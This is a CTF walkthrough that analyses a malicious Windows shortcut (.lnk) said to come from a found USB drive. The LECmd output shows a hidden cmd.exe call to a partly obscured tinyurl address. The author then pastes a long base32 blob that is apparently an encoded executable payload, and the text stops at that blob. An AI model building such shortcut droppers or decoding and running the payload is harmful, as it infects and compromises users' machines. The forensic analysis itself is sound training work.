Thumb drive

Thumbdrive #

Challenge: People say you shouldn’t plug in USB drives! But I discovered this neat file on one that I found in the parking lot…

Firstly I checked what kind of file it was:

shanna@ubuntu:~/Downloads$ file ADATA_128GB.lnk.download 
ADATA_128GB.lnk.download: MS Windows shortcut, Item id list present, Points to a file or directory, Has Description string, Has command line arguments, Icon number=30, Archive, ctime=Sun Nov 21 11:24:03 2010, mtime=Sun Nov 21 11:24:03 2010, atime=Sun Nov 21 11:24:03 2010, length=302592, window=hidenormalshowminimized

So I used LECmd.exe from EZTools to parse the link file:

Source file: C:\Users\shanna\Downloads\huntress-ctf-malware\ADATA_128GB.download
 Source created: 2023-10-31 00:10:54
 Source modified: 2023-10-31 00:11:33
 Source accessed: 2023-10-31 04:14:46

--- Header ---
 Target created: 2010-11-21 03:24:03
 Target modified: 2010-11-21 03:24:03
 Target accessed: 2010-11-21 03:24:03

 File size (bytes): 302,592
 Flags: HasTargetIdList, HasLinkInfo, HasName, HasArguments, HasIconLocation, IsUnicode, HasExpString
 File attributes: FileAttributeArchive
 Icon index: 30
 Show window: SwShowminnoactive (Display the window as minimized without activating it.)

Name: ADATA 128GB
Arguments:    /V/R  CMD<https://
Icon Location: inyurl.com/a7ba6ma??????????????e

--- Link information ---
Flags: VolumeIdAndLocalBasePath

>> Volume information
 Drive type: Fixed storage media (Hard drive)
 Serial number: 4E595676
 Label: (No label)
 Local path: C:\Windows\System32\cmd.exe

--- Target ID information (Format: Type ==> Value) ---

 Absolute path: My Computer\C:\Windows\System32\cmd.exe

 -Root folder: GUID ==> My Computer

 -Drive letter ==> C:

 -Directory ==> Windows
  Short name: Windows
  Modified:  2019-09-30 12:50:02
  Extension block count: 1

  --------- Block 0 (Beef0004) ---------
  Long name: Windows
  Created:   2009-07-14 03:20:10
  Last access: 2019-09-30 12:50:02
  MFT entry/sequence #: 624/1 (0x270/0x1)

 -Directory ==> System32
  Short name: System32
  Modified:  2022-02-25 11:06:08
  Extension block count: 1

  --------- Block 0 (Beef0004) ---------
  Long name: System32
  Created:   2009-07-14 03:20:12
  Last access: 2022-02-25 11:06:08
  MFT entry/sequence #: 2313/1 (0x909/0x1)

 -File ==> cmd.exe
  Short name: cmd.exe
  Modified:  2010-11-21 03:24:04
  Extension block count: 1

  --------- Block 0 (Beef0004) ---------
  Long name: cmd.exe
  Created:   2010-11-21 03:24:04
  Last access: 2010-11-21 03:24:04
  MFT entry/sequence #: 36705/1 (0x8F61/0x1)

--- End Target ID information ---

---------- Processed C:\Users\shanna\Downloads\huntress-ctf-malware\ADATA_128GB.download in 0.14865680 seconds ----------

From the info I see the icon lacation of inyurl.com/a7ba6ma??????????????e which I interpretted to be hxxp://tinyurl.com/a7ba6ma??????????????e and I was correct and a text file called usb.txt was downloaded with the following contents:

JVNJAAADAAAAABAAAAAP77YAAC4AAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA7AAAAAAOD65A4AFUBHGSDOABJTGSCVDINFZSA4DSN5TXEYLNEBRWC3TON52CAYTFEBZHK3RANFXCARCPKMQG233EMUXA2DIKEQAAAAAAAAAAAZ3NYOZSGDFN4ARQZLPAEMGK3YBKOQ7OAIIMVXQIE65M4EQQZLPAQJ52RYJJBSW6BAT3VHQSSDFN4CBHXLXBEIGK3YBXM6WOCJQMVXQCGDFM4ABQZLPA2F52JYJCBSW6BUL3VXQSEDFN4DIXWUXAEIGK3YGRPOX6CIQMVXQFE2LDNARQZLPAAAAAAAAAAAAAAUCFAAAEYAIFADLX6VTCAAAAAAAAAAAABYAAAIQQWAIODYABAAAAAAKAAAAAAAAAABIVAAAAAEAAAAACAAAAAAAAAEAACAAAAAACAAAAMAAAAAAAAAAAAYAAAAAAAAAAAADAAAAAABAAAAAAAAAAAIAEAAIAAAIAAAAQAAAAAAAQAAABAAAAAAAAAAAQAAAABUBGAAAGYAAAAA6COAAAMQAAAAAAIAAABYABAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACQAAAGYAIAADQCCAAAOAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAUBCAAAEAAAAAAAAAAAAAAAAAAAAEAAAA4AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAXHIZLYOQAAAAE3BYAAAAAQAAAAAEAAAAAAIAAAAAAAAAAAAAAAAAAAAAACAAAAMAXHEZDBORQQAADOBIAAAABAAAAAADAAAAABIAAAAAAAAAAAAAAAAAAAAAAEAAAAIAXGIYLUMEAAAAEMAMAAAABQAAAAAAQAAAACAAAAAAAAAAAAAAAAAAAAAAAEAAAAYAXHE43SMMAAAAHAAEAAAACAAAAAAAQAAAACEAAAAAAAAAAAAAAAAAAAAAAEAAAAIAXHEZLMN5RQAADMAEAAAACQAAAAAAQAAAACIAAAAAAAAAAAAAAAAAAAAAAEAAAAIIAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACVRPWID3C4AEAABIIEGAABAM6FRFC7YDZIAVQCCAAQGPAA6EMFUT7P776HQU2P7777GMAAAAAPFACRAIIACAHRDBNU73777R4FHD7777ZGAAAAADZIAXACCAAQB4IYLRH67774OROMK4AAAAAPFAC3AIIACAHRDBOU73777R2F2BNQAAAAB4UALUBBAAIA6EMF4T7P77YPFACYAIIACAHRDBPU73776DZIAUACCAAQB4IYKBH7777Q6KAF2AQAAEAPCGCRJ77774HSQBJAEEABADYRQUSP7777B4UALIBBAAIA6EMFHT7777YPFAC4AIAACAHRDBKM77776DZIAWICCAAQB4IYKXH7777Q6KAFKAQQAEAPCGCWZ77774HSQBLQEEABADYRQV6P7777B4UAKMBBAAIA6EKFRQHSQBPQEAABADYRIWOA6KAF4AQAAEAPCFC2YDZIAVACCAAQB4IULPDGB4PYIAAAAAAAAD5WRSCTZ77774ZIZBNE73777CCMAXKA7NUMQVAP7777GKGILKH6777YQTAF2WB4AAUD7ATHFUTKABUKYIAACCGULVCQNIAP6FJUEAABBC2N7QZ4AM6N5A5AAAAARPSV3QQEADGMZTGMZTGMZTGMZTGMZTCVRPWIG3IMAF2RK2QANIAGUADIAAIAAEDKABVAB7YVAAQAAEFYAEAAAAC5YIGAAOYNAQYAAEDVAHB6TCYDAAAFLC7MRNCQZA7IAB2DHA7IAF2CBA7IAF2BDA7IAF2AKM6AIDVTB2AIAYAAB2YF5DRAKAAAB63MB2Y7752RB73VBDUBQAAAABM6WEEDPUIAAD4VYAH3NQCQ5AGACAAALFO4EDAANIIGQQBGAAIOQXAJAAAGUAHIG4DAAACZQTAA7BGRAAAAB2BOAUAABCCF4OZQDCC546BWL7AAQM6VQMYACAAA7BOFAAAABRYFLAZQAEABAAAAB2DDAUAABBGAORG6ROQIAAAOQ4YEAAAOREQEAAAGRBBAAAIGRABAAAIOQ4ALAAAFSWMFYB2ST2ALAUAABBGAOQQGQ7BAAAIGQ6BAAAIOQTALAAAFSWOHAVMDGAAQAIAAAABS3OEF3Z6HIX6P577777UD2AAAACCNW5KD5A2AOAAARPYIGPQAOQPVN2COAYAAAWMEYB2BJ73VBRVAF73VBCFTNC6O74KXAIAACD75N7YFDAYAAEBTYBAOWD4KLXT765PD5CZQMAAALHBTHQELJXYGJCINAAAAAACZL5PFXSODNID6RYYGAAAMY2QQNBQCMAAQ5BKQQAAAUEMDAAAQQXAH6BBTYDVWSSFDDAYAAEBT75DYS7PEQNS7YAHIDICAAAEIIXQIS7P4QM6VQMYACABHK27I2ECAAAHIRABQAAHI4UDQAAEDEVMDGAAQACBWL7AA5A4QAAAANIAP65II5BHAMAAALFMQ7NXQ67PBX5RD66EXLZGHIX6P577777UCEAAAACF4NC2N6BSISDIAAAAAAWK7LZN4TQ4LPXSP65PA5D5AKAAALHBYW5PE5CHQIAAAYNVAP2BTAYAABTDKBRUIQJQACDUKKBYAACFX2DEF752Q6OJ5DAYAAED7A4Z4B2OZAAAABA3F7QAIH7YBOQFIH7YCOQCYWXIQ5MYYWXIQKNL765II5DEQAAAARPYIS5PEQX3A7BFDAAAAAU2X752QR2E57X777C7QRF26JBPWB6CIYAAAABJVP73VBDUFD7P776F7BCLV4SB76ALVE6C7M5JDKNIP65II5A473777QXNQ7FOAB63MAUHIXL7P772ZKNLP65II5BVAAAAAQX7XIBMD74BXKSCTK77XKCHIIL67774L6CEXLZEF6Z2DKU2X752QR2CEAAAABC7Q5MSIWTPMRMAVD7ZQNDCRCAAQ752RB73VBT7XKCHIJEBQAAEDYQMMHC3F5AZ7NCLV4TDUL7H677777C6GRNG7AZEJBUAAAAAALFPV4W6JYNKYX3CWRM22AIAACCC7M5IFGPAEB2YT752RBC6O752QZ73VBD7RK4BAAAIP7VS6LXBAYACVRPWIG7IMAF2QL2EEAEAAB73VCD7XKDH7OUEORLX6777YHRAMLXBAYACVRPWGUAH7CUUCAAAQ752QR7YVFQQAAEDIBECABQH7CUSCAAAQKD7RKIBAAAIF3Q2VRPWID3BEAMAAA2QX74KRYIAACCC4A5AFNIBFTTJJUMQDCAAQREGRYMIACCERKGBRAAIISHIUGEABBCJVCAYQAEEJHUGDCAAQM2GBKOBRAAIGNDANFQYQAEDGRQOQQMIACBTIYBIEGEABAZUMEUADCAAQM2GC37BQAAIJZDYFGAYQAEELIUAKGJBRAAIIWRIEUMUDCAAQRVCQRIZUGEABBC4F3T6P776HAVYDAAAQAEAACAFBFAYQAEFDFQYAAEGHAUQDAAAQBECABQGHAUSDAAAQAEAAAAGHAUYDAAAQAEAAAADKARMGXQAAY6ADIMAACABAAAAANICFQ26AACFQ2BBQAAIISTAF7BVAIWGB4AAIWDIAGAABBCKMAX4GRJBAAAIORYH67774TQ2VRPWIH3AUQNS7IAENIX2IGZPYABIP6FIMEAABBC2F7AZUL5EJIX6P6FIQEAABAMKF7T7RKFBAAAIDCRP4RVC6YUH7CUMCAAAQRNC7BDKN7QZUL3BTIX6DHQOJYOFQ2BBQAAIFMV57J3TEBO56AAAP77Z3Z52AJBOOOUTORFH7777YXSB3Z52QPOKP4ZALX2YOQXHHKCQNCFDQAAGB4AIAXSEJBUCDAAAQ67IV7CINAAYAAEC6YNUEAMYACD7RKCBAAAIMG2CAGMABB2HDAYAAAWODXBEDGAAQYO4FAMYACDB6R377777YWSAEQMECJCKIATUOP77776FUQBEDBABISSAEYNKYX3ELIUEFNC2IHQB4QD5XIEKI2UIYAPIA7N2BAZV7AKAD6I55M5AZRNGQYO2KBRZAVC2CBABUEDB3ZBZAZA6CFA55M5PKGPAF4XODRPBOX6KW5BRAMAAAQXAHIIDEUEMAAAAAXZODGAAQRNIAJ2YEHPIHIEBTYCF4V4APWEHILQDV6AZMAXWDWAAV5Q7IGEDAAAEFYB2AP2CQAQAAB2YY5AOQMAAAKDUEWBQAABMYLQDUAMZMBQ7IIQDAAAFQAHBWUAHI2AAAAAEEYBMQ7FOAYPUEMBQAACCMA5IDGLAMH2B2AYAABBGAOUD6QMIGAAAOX3NQAHB6QJYGAAAOQIQGAAALAAODKWF6Z2GJAUAABBOAOUMYG7IMAF2RH73VCCFU2FCQ752QR7YVOAQAAEH7KUKP65I4752RR2GLAUAAAWKZLXB6RGAFAAAILQDUBRUGIMYACDUMYBIAABM4H2GUAUAABBOAB6CMGBIAADBWUAHIYECQAACZ5G5QKAAAKWF6ZA35BAAHKB6GAVQDGAAQAHUIAAYAADUKCBIAACCMA5IEGLAF3Q7ISQCQAAEEYB2QU2QA5CEQKAAALHV6TMABLXBVLC7MQA6WCMYACAAHIBFQAFO4GVULOUEIL5TUAWB74ALVMLUBEBIAACC4A5BGQX3HKITIMQZQAEHIHQCQAACZQXAHKD3IOAZQAEHIFUCQAACZQXAHIKZSYDVTBA6J76EQ2ZBTAAIISDLIGMABBCINNQZQAEEJBVYDGAAQREGXIMYACCEQ26BTAAIMMBLBGMABAANQAFPF3Q3KAXUOAAAAADGGUCDIVATAAEHIKIBAAAEDMX6ABOCNLIAAAZRZAUAAAAAQOVO2CPAAAAIIDOAAAAABAUCFAAAHKTFZBMAQAADGHGEBQAAACB2T5C2FBC4QAAAACAV4CUCR5CZ73777LFMYLQDUE6BXQJAAPQQ4ORP47377775QAHVR7C2F5SFQAM6JQE4AKAAAYAHZJQMLYHBYWZPIY5C7Z7X7777TFQELJXYGJCINAAAAAACZL5PFXSODKWF6Z2ARAQAABBOAOQHYA7IIAB2QSM6AXFODGAAQQ4AV3Q2VRPWIAPLAGMABAADUA2AH2DAAOUJP65II5AYAIAAA752QR2BIAQAAAWKZWAAV3Q5YRAZQAEGDKWF6ZAPMEQBQAACTNIL76FI4EAABBBOAOQCYWTIIZUUWUA7I7EAAAAGHAQSMYAQAACGYLXH4777WUACQ5CUQGAAAQPCAZCMFRT67774JRWEP3777RGKYJ7P776EZ3AH5777YTNL47X777CN5PD67773GRSK2J7P775TIZDMY7X776ZUMTV2P3777M2GIK4H5777WNDFFNT67773GRSWWR7P776OI7BM47X777C2FASEYLFH5777Y2RIERGC2B7P777DYLXH4777QCAABACFUB7DKKCEYLEH5777Y2RNINIAFB2A7AMAABC2FASB4IDGHIWUBKAAAIDDULLABAAAABCKFWT7RKBBAAAIGUAENLD77PW4NIWUISRPYRWC5Z7H774NNXCKF7T7MH7YVFAQAAEENIX4FB7YVFQQAAEEFYB2QZBG3OUEGUA7IAQAAAACZLPE4HAZFPQZQAEAAYNJVNPRQEYABBOZQEYABAO7TOMMVPCZ6QX7XICULZ77RK4BAAAIP7V4DYYCDX43S5FPV4W6DKNLL4OBGAAILWOBGAAIDX43TDFLYWPUF752AVC6P74KXAIAACD75PA6GAQ57G4XJL5PFXQ6MZTGMY2GFDMABAZH7GUAAAAAARNCCIEEJNQSBBDLMEQICXYCTKZL2CBBQAAIDCRP4GPCVBCLF5D7XL6ELIX6MORP47377774JIX4I2RPQMSRQAAAAADBVLC7MK2FXKCH7G3UFAAQAAD7XKFEJA37XKEH7OUGFM2FXCEABA2AEGAABB2HZAEAABA6EDRPF3Q6CAAAFLC7MQMSYAMYACAAIH3BEQMGRAMAACAAWUCX7CUOCAAAQQXAA7BFMAEAABA3F6AADHQCTKZLTHSMNPXOFGD5CRPZVXEEJA6EXOBEJJ4EDHSMJK4GIWRO4RN66BCKF6SA7OR3FNZ2YWRPIGVUW4ZKJRFC7ZC2F4Q2W45DFNSEUL6BTYBAFGD5CRPZVXEENLXOISA4LIX6AWRPYBPDYS4YERFFQRCKTBR2UHC2F3QS7AP77B464ABQBAB2CGPLAAYBAA5A4HVYAMAQAOQKT2UAGAMAHIDR5MADAGADUA46XABQDAB2RDCZ5QQZQAEEDZ4AYSPMEGMABB2YGRM6YIMYACCFU3ZDKA5MISTP4HFC7I7BQGPEVGD5CRPZVXEENLXOISA4JOMCISSYIRNG7ZCKTBSFV3YHXYMAAEAAAOQHIHTYCRE6YIMYACDVQHC256CQRAMAACCB4QAWHAWADGAAQAEAAAAFDCAYAAEHXYEAAAEAAB6CJGAAAACB4QBGHAWADGAAQAIAAAAFDCAYAAEHXYEAAAAAIOR47PQIAAAABA5DRGPEQ6AOQRFC6ZCKV6CFUL3ELJXYGUBS6EPDDXRTVK6QRAMAACCB4QCGHAWADGAAQAMAAAAFDCAYAAEHWYMQHIO4DZAQMOBMAGMABABIAAAAKGEBQAAILQAAAAPICHWB33B2R5C2F5S5OAAAAACFU34BDYI54E5INQMGRAMAACBAISNMAGMABAX26LMZ4BSODGPAEBQZTYA4QKFBQAAIA7FOAYP7SKPBAAAIP6JKAEAABB7ZFIQQAAEH7EVICAAAQ74SVYIAACD7SKZBAAAIP6JKYEAABB7ZFNAQAAEH7EVGCAAAQ74SWAIAACD7SKVBAAAILAAODGPAMGVML5RIYGPMAGMABAAL4M2AX2CFUAIAMA5AJQF6QRNICADAHKVAPVZO7ZC2F7SB7AP5IQF2D7KIEAIAAA5IHXCHAAAGAZHB2SAQBAAAHIKVJBACAAADVA64JCAAAYDE4HKIQBAAAA5IHXCJQAAGAZHB2SIAQAAAHKDVYR4AABQGJYO4JAAAAYDE4HC2FBDE4GAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACAUAAAC2FIAAARBKAAACUKQAAAKCUAAA7YUQAAHEFEAABSBJAAALIKIAACQCSAAAQIUQAADGFEAAAAAAAAAC4KAAAAAAAAAAJAUAAADIFAAAA4RIAAAAAAAAAADCSAAATYUAAAB2FEAABSRIAAAKUKAAAARCSAAAXAUAAAHEFAAAAAAAAAAPIGYACAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABAGAABA4BQAAIFS33VOIQGM3DBM4QGS4Z2AAAAAAAAAAANGAAAADUQAAAA6AAAAAALAAAABGAAAAAFMAAAACFAAAAACYAAAAH6AAAAA3QAAAALWAAAAARAAAAABQAAAABAAAAABFAAAAADQAAAAA2QAAAACAAAAAHXAAAAAXIAAAAKQAAAADMQAAAASEAAAADNAAAAAKAAAAAAQAAAABUQAAAATMAAAAFLAAAAAFQAAAAGIAAAACSAAAAAJMAAAADOAAAAADAAAAAKQAAAADJAAAAA7QAAAAFGAAAABPIAAAAIIAAAADDAAAAAXUAAAAF7AAAABRYAAAAAKAAAADTAAAAAYAAAAAE4AAAAA5IAAAAAOAAAADDAAAAAHIAAAABTAAAAA7AAAAANKAAAADRAAAAAVIAAAAG4AAAABWAAAAALGAAAADFQAAAASIAAAAG6AAAAACAAAAAAWAAAABFQAAAA4YAAAAFBAAAAAZAAAAAN6AAAAD2QAAAAAAAAAAGXP5LGEAAAAAAAEAAAAB5AAAAALQRQAAC4C4AAAAAAAAANO72WMIAAAAAABQAAAAAUAAAABWBDAAANQFYAAAAAAAAA257VMYQAAAAAADIAAAAEAAQAADWCGAAA5QLQAAAAAAAABV37KZRAAAAAAAHAAAAAAAAAAAAAAAAAAAAAAAALYAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAIMAACBACGAAQAEAAAADQEAABAAAAAAAAAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEIIYACAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB2CAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAMKGYAAAMAAAAAACAABAAAAAAAAAAAAAAAAAAAAAAAAAAAKJJUIU4CP246B5MC6BEJDZE7PKHSXBX4AQAAAACDHJOFK43FOJZVY2TPNBXFYRDPO5XGY33BMRZVY2DFNRWG6LLXN5ZGYZBNMRWGYLLNMFZXIZLSLRUGK3DMN4WXO33SNRSC2ZDMNQWW2YLTORSXEXCSMVWGKYLTMVOHQOBWLRUGK3DMN4WXO33SNRSC44DEMIAAAAAAAAAAAFIAAAABKAAAAAAAAAAACQAAAACHINKEYAAQAAAJWDQAAAXHIZLYOQSG23QAAAAAAABAAAAHAAAAAAXGSZDBORQSINIAAAAAA4BAAAAAQAAAAAXDAMDDMZTQAADYEAAAABAAAAAC4Q2SKQSFQQ2BAAAAAAD4EAAAABAAAAAC4Q2SKQSFQQ22AAAAAAEAEAAAABAAAAAC4Q2SKQSFQSKBAAAAAAEEEAAAABAAAAAC4Q2SKQSFQSK2AAAAAAEIEAAAABAAAAAC4Q2SKQSFQUCBAAAAAAEMEAAAABAAAAAC4Q2SKQSFQUC2AAAAAAEQEAAAABAAAAAC4Q2SKQSFQVCBAAAAAAEUEAAAADAAAAAC4Q2SKQSFQVC2AAAAAAFAEAAABIACAAAC44TEMF2GCAAAIARQAAAEAAAAALTSMRQXIYJEON4GIYLUMEAAAACEEMAAAGAAAAAC44TEMF2GCJDWN5WHI3LEAAAAAXBDAAANAAQAAAXHEZDBORQSI6T2PJSGEZYAAAACYJQAAACAAAAAFZZHIYZEJFAUCAAAAAADAJQAAACAAAAAFZZHIYZEJFNFUAAAAAADIJQAAACAAAAAFZZHIYZEKRAUCAAAAAADQJQAAAEAAAAAFZZHIYZEKRNFUAAAAAAEAJQAACIAAAAAFZ4GIYLUMESHQAAAAAANAJQAABWAAAAAFZSWIYLUMEAAAPBHAAAFAAAAAAXGSZDBORQSIMQAAAAABDBHAAABIAAAAAXGSZDBORQSIMYAAAAABIBHAAAHAAAAAAXGSZDBORQSINAAAAAAAEBIAAAF4AQAAAXGSZDBORQSINQAAAAAAABQAAABQAAAAAXGIYLUMEAAAAAYGAAAA5ADAAAC4YTTOMAAAAAAABAAAADAAAAAALTSONZGGJBQGEAAAAAAMBAAAAEAAEAAALTSONZGGJBQGIAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA737777YAAAAABUH7777QAAAAAD7P7777AAAAAAHYCIABAAAAAAAP577774AAAAAA2D7777YAAAAAB7X7777QAAAAAC7BGAAQAAAAAAAAAAAABMITAAIP577774AAAAAA2T7777YAAAAAB7X7777ZUFAACC4RIAAQAAAAAAH677776AAAAAANR77774AAAAAA7377774HDEABBGQZAAIAAAAAAAAAAAAAAAAAAAAAAAAAB777777QAAAAAAGCOAAAAEAAAAACAAAAAAQAAAAPQJQAAAACOAAABATQAAEQCEAAAAAQAAABYJYAAAUCOAAAAAAACADIMVWGY3ZNO5XXE3DEFZSGY3AAL5CGY3CNMFUW4QBRGIAF6TLFONZWCZ3FIJXXQVDIOJSWCZCAGQAKAJYAAAAAAAAAAAAAAABAFAAAAABAAAANIJYAAAAAAAAAAAAAAAB4FAAAANBAAAANYJYAAAAAAAAAAAAAAAEMFAAAAPBAAAAOYJYAAAAAAAAAAAAAAACEFEAAATBAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABAKAAABNCUAAAIQVAAABKFIAAAFBKAAAP4KIAADSCSAAAZAUQAAFUFEAABIBJAAAIEKIAABTCSAAAAAAAAABOFAAAAAAAAAAEQKAAABUCQAAAOIUAAAAAAAAAABRJAAAJ4KAAAA5CSAAAZIUAAAFKFAAAAIRJAAALQKAAADSCQAAAAAAAAAHWABBXEZLBORSVI2DSMVQWIAAAJNCVETSFJQZTELTENRWAAAEBAJGWK43TMFTWKQTPPBAQAVKTIVJDGMROMRWGYAAAEUAF6X3TORSF65DZOBSV62LOMZXV6ZDFON2HE33ZL5WGS43UAAAEQADNMVWXGZLUAAADKAC7MV4GGZLQORPWQYLOMRWGK4RUL5RW63LNN5XAAVSDKJKU4VCJJVCTCNBQFZSGY3AAAA4AAX3JNZUXI5DFOJWQAOIAL5UW42LUORSXE3K7MUAECAC7ONSWQX3GNFWHIZLSL5SGY3AADEAF6Y3PNZTGSZ3VOJSV63TBOJZG6527MFZGO5QAAA2QAX3JNZUXI2LBNRUXUZK7NZQXE4TPO5PWK3TWNFZG63TNMVXHIAAAGYAF62LONF2GSYLMNF5GKX3PNZSXQ2LUL52GCYTMMUAAAJAAL5SXQZLDOV2GKX3PNZSXQ2LUL52GCYTMMUABOAC7MNSXQ2LUAAAGC4DJFVWXGLLXNFXC2Y3SOQWXE5LOORUW2ZJNNQYS2MJNGAXGI3DMACYQKVLONBQW4ZDMMVSEK6DDMVYHI2LPNZDGS3DUMVZAAADRAVJWK5CVNZUGC3TENRSWIRLYMNSXA5DJN5XEM2LMORSXEAA2AJDWK5CDOVZHEZLOORIHE33DMVZXGAEQAVKGK4TNNFXGC5DFKBZG6Y3FONZQAAEJANEXGUDSN5RWK43TN5ZEMZLBOR2XEZKQOJSXGZLOOQAE6BCROVSXE6KQMVZGM33SNVQW4Y3FINXXK3TUMVZAAGYCI5SXIQ3VOJZGK3TUKBZG6Y3FONZUSZAAD4BEOZLUIN2XE4TFNZ2FI2DSMVQWISLEAAAOYASHMV2FG6LTORSW2VDJNVSUC42GNFWGKVDJNVSQAZQDJFXGS5DJMFWGS6TFKNGGS43UJBSWCZAAQIBUS42EMVRHKZ3HMVZFA4TFONSW45AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAALCGN7IRHOMQF3777777YAAAAAAAIAAAAACAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAIADAAAAAAYAAAIAAAAAAAAAAAAAAAAAAAAAAAACAACAAAAAMAAACAAAAAAAAAAAAAAAAAAAAAAAAAQACIEAAAEQAAAABQEAAAAPUAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAHQ7XQ3LMEB3GK4TTNFXW4PJHGEXDAJZAMVXGG33ENFXGOPJHKVKEMLJYE4QHG5DBNZSGC3DPNZST2J3ZMVZSOPZ6BUFDYYLTONSW2YTMPEQHQ3LMNZZT2J3VOJXDU43DNBSW2YLTFVWWSY3SN5ZW6ZTUFVRW63J2MFZW2LTWGETSA3LBNZUWMZLTORLGK4TTNFXW4PJHGEXDAJZ6BU